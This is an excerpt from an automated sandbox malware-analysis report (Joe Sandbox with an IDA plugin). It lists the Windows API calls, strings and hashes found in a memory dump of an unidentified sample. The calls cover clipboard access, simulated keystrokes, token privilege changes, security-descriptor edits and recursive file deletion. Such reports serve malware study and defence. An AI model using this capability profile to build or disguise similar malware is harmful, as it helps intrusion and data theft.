                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0051FD57
                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0051FD87
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0051FE1C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                              • String ID: @GUI_DRAGID$F
                                                                                                                                                                              • API String ID: 2516578528-4164748364
                                                                                                                                                                              • Opcode ID: d1c19cf62dfc9fde597fa84809f4061e89843fd3ccb1181857be4b2bde106426
                                                                                                                                                                              • Instruction ID: 81b9797078338b633a23fbbfba418ff6e6dfd74eed8dfa0b78f905f76eda2303
                                                                                                                                                                              • Opcode Fuzzy Hash: d1c19cf62dfc9fde597fa84809f4061e89843fd3ccb1181857be4b2bde106426
                                                                                                                                                                              • Instruction Fuzzy Hash: 44328C71204201AFE710DF68D884AAABFF9FF48358F140A29F6A6872B1D731DC95DB51
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0051AFDB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: %d/%02d/%02d
                                                                                                                                                                              • API String ID: 3850602802-328681919
                                                                                                                                                                              • Opcode ID: e0ec9c54a355e344aa21cf73d7b9003ebb8d7b04b48f591d4080e97b6cf6aaa6
                                                                                                                                                                              • Instruction ID: 060c2d181d76e01ecceae61ec3f5d21db80eebe5b011bc33a9dbe3dd1c528915
                                                                                                                                                                              • Opcode Fuzzy Hash: e0ec9c54a355e344aa21cf73d7b9003ebb8d7b04b48f591d4080e97b6cf6aaa6
                                                                                                                                                                              • Instruction Fuzzy Hash: 8012DEB1601204ABEB268F65DC49FEE7FB8FF45310F10421AF51ADB291DB748985DB22
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 004CF796
                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00524388
                                                                                                                                                                              • IsIconic.USER32(000000FF), ref: 00524391
                                                                                                                                                                              • ShowWindow.USER32(000000FF,00000009), ref: 0052439E
                                                                                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 005243A8
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005243BE
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 005243C5
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 005243D1
                                                                                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005243E2
                                                                                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005243EA
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 005243F2
                                                                                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 005243F5
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052440A
                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00524415
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052441F
                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00524424
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052442D
                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00524432
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052443C
                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00524441
                                                                                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00524444
                                                                                                                                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0052446B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                              • API String ID: 4125248594-2988720461
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004EBF0F
                                                                                                                                                                                • Part of subcall function 004EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004EBF3C
                                                                                                                                                                                • Part of subcall function 004EBEC3: GetLastError.KERNEL32 ref: 004EBF49
                                                                                                                                                                              • _memset.LIBCMT ref: 004EBA34
                                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004EBA86
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004EBA97
                                                                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004EBAAE
                                                                                                                                                                              • GetProcessWindowStation.USER32 ref: 004EBAC7
                                                                                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 004EBAD1
                                                                                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004EBAEB
                                                                                                                                                                                • Part of subcall function 004EB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004EB9EC), ref: 004EB8C5
                                                                                                                                                                                • Part of subcall function 004EB8B0: CloseHandle.KERNEL32(?,?,004EB9EC), ref: 004EB8D7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                              • String ID: $default$winsta0
                                                                                                                                                                              • API String ID: 2063423040-1027155976
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                                                                                                                                                • Part of subcall function 004F7B9F: __wsplitpath.LIBCMT ref: 004F7BBC
                                                                                                                                                                                • Part of subcall function 004F7B9F: __wsplitpath.LIBCMT ref: 004F7BCF
                                                                                                                                                                                • Part of subcall function 004F7C0C: GetFileAttributesW.KERNEL32(?,004F6A7B), ref: 004F7C0D
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6B9D
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6BBB
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004F6BE2
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004F6BF8
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004F6C57
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6C6A
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6C7D
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004F6CAB
                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004F6CBC
                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 004F6CDB
                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 004F6CEA
                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 004F6CFF
                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004F6D10
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004F6D37
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004F6D53
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004F6D61
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 1867810238-1173974218
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenClipboard.USER32(0054DBF0), ref: 005070C3
                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 005070D1
                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 005070D9
                                                                                                                                                                              • CloseClipboard.USER32 ref: 005070E5
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00507101
                                                                                                                                                                              • CloseClipboard.USER32 ref: 0050710B
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00507120
                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0050712D
                                                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 00507135
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00507142
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00507176
                                                                                                                                                                              • CloseClipboard.USER32 ref: 00507283
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3222323430-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004FFE03
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004FFE57
                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004FFE7C
                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004FFE93
                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 004FFEBA
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FFF06
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FFF3F
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FFF93
                                                                                                                                                                                • Part of subcall function 004D234B: __woutput_l.LIBCMT ref: 004D23A4
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FFFE1
                                                                                                                                                                              • __swprintf.LIBCMT ref: 00500030
                                                                                                                                                                              • __swprintf.LIBCMT ref: 0050007F
                                                                                                                                                                              • __swprintf.LIBCMT ref: 005000CE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                              • API String ID: 108614129-2428617273
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00502065
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0050207A
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502091
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 005020A3
                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 005020BD
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 005020D5
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 005020E0
                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 005020FC
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502123
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0050213A
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0050214C
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00563A68), ref: 0050216A
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00502174
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00502181
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00502191
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 1803514871-438819550
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 005021C0
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 005021D5
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 005021EC
                                                                                                                                                                                • Part of subcall function 004F7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004F7621
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0050221B
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00502226
                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00502242
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502269
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502280
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00502292
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00563A68), ref: 005022B0
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 005022BA
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 005022C7
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 005022D7
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 1824444939-438819550
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove_memset
                                                                                                                                                                              • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                                                              • API String ID: 3555123492-286096704
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                                                                                                                                                • Part of subcall function 004EB8E7: HeapAlloc.KERNEL32(00000000,?,004EB3CB,?,?,?), ref: 004EB923
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                                                                                                                                                • Part of subcall function 004EB982: GetProcessHeap.KERNEL32(00000008,004EB3E1,00000000,00000000,?,004EB3E1,?), ref: 004EB98E
                                                                                                                                                                                • Part of subcall function 004EB982: HeapAlloc.KERNEL32(00000000,?,004EB3E1,?), ref: 004EB995
                                                                                                                                                                                • Part of subcall function 004EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004EB3E1,?), ref: 004EB9A6
                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004EB3FC
                                                                                                                                                                              • _memset.LIBCMT ref: 004EB411
                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004EB430
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004EB441
                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 004EB47E
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004EB49A
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004EB4B7
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004EB4C6
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004EB4CD
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004EB4EE
                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 004EB4F5
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004EB526
                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004EB54C
                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004EB560
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3996160137-0
                                                                                                                                                                              • Opcode ID: 000e88e0e81c367e4166a7b2de5c82b09398c9dc7034802c898a570549f36206
                                                                                                                                                                              • Instruction ID: 8b549389e37f23c3cc4a22edb636603959bf5fa4ae6ee765b1f8b22b39ab6603
                                                                                                                                                                              • Opcode Fuzzy Hash: 000e88e0e81c367e4166a7b2de5c82b09398c9dc7034802c898a570549f36206
                                                                                                                                                                              • Instruction Fuzzy Hash: A8515A71900249ABCF04DFA2DC48AEFBB79FF04745F04811AF911A63A1DB389A05DFA4
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                                                                                                                                                • Part of subcall function 004F7C0C: GetFileAttributesW.KERNEL32(?,004F6A7B), ref: 004F7C0D
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6E7E
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004F6E99
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004F6EAE
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004F6EDD
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6EEF
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6F01
                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004F6F0E
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004F6F22
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004F6F3D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 2643075503-1173974218
                                                                                                                                                                              • Opcode ID: ee945507a9565c7d54c2551b144d28dfaacd6a4c9dbe8c897b64a7df8d78fae4
                                                                                                                                                                              • Instruction ID: a9480b40b2ff53407d09b405030a9c62f375ea2da9ca7b4f316bdd9d96c2a353
                                                                                                                                                                              • Opcode Fuzzy Hash: ee945507a9565c7d54c2551b144d28dfaacd6a4c9dbe8c897b64a7df8d78fae4
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F21C5B2408348AAC310EBA4D8559EBBBEC9F59214F044E5FF5D4C3252EA38D64DC776
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                                                              • API String ID: 0-2893523900
                                                                                                                                                                              • Opcode ID: 8e84dbbd1d0b22ee716732181b09ae14577c874c64712c1204f903254f96b906
                                                                                                                                                                              • Instruction ID: 32adf74dce9c4d6c377b61d7eccbf0dcdb84ed04bbeab6bb3dd822ef06177ae3
                                                                                                                                                                              • Opcode Fuzzy Hash: 8e84dbbd1d0b22ee716732181b09ae14577c874c64712c1204f903254f96b906
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A6281B1E002199BDF14DF99C8817EEBBB5BF48310F15816BE845EB281D7789E41CBA4
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1737998785-0
                                                                                                                                                                              • Opcode ID: cdd8b7c1851123017cab4258a15931c774dbfcfda9b65c4387ecb74eeed19eab
                                                                                                                                                                              • Instruction ID: 2c36732fa29d0fa9b5e308d2037fa2be436ce9630509fbf382438264bdcaeac8
                                                                                                                                                                              • Opcode Fuzzy Hash: cdd8b7c1851123017cab4258a15931c774dbfcfda9b65c4387ecb74eeed19eab
                                                                                                                                                                              • Instruction Fuzzy Hash: DF21F635600115AFD7106F25EC1AB6E7BB8FF14710F00801AF9098B3A1DB78ED04EBA8
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
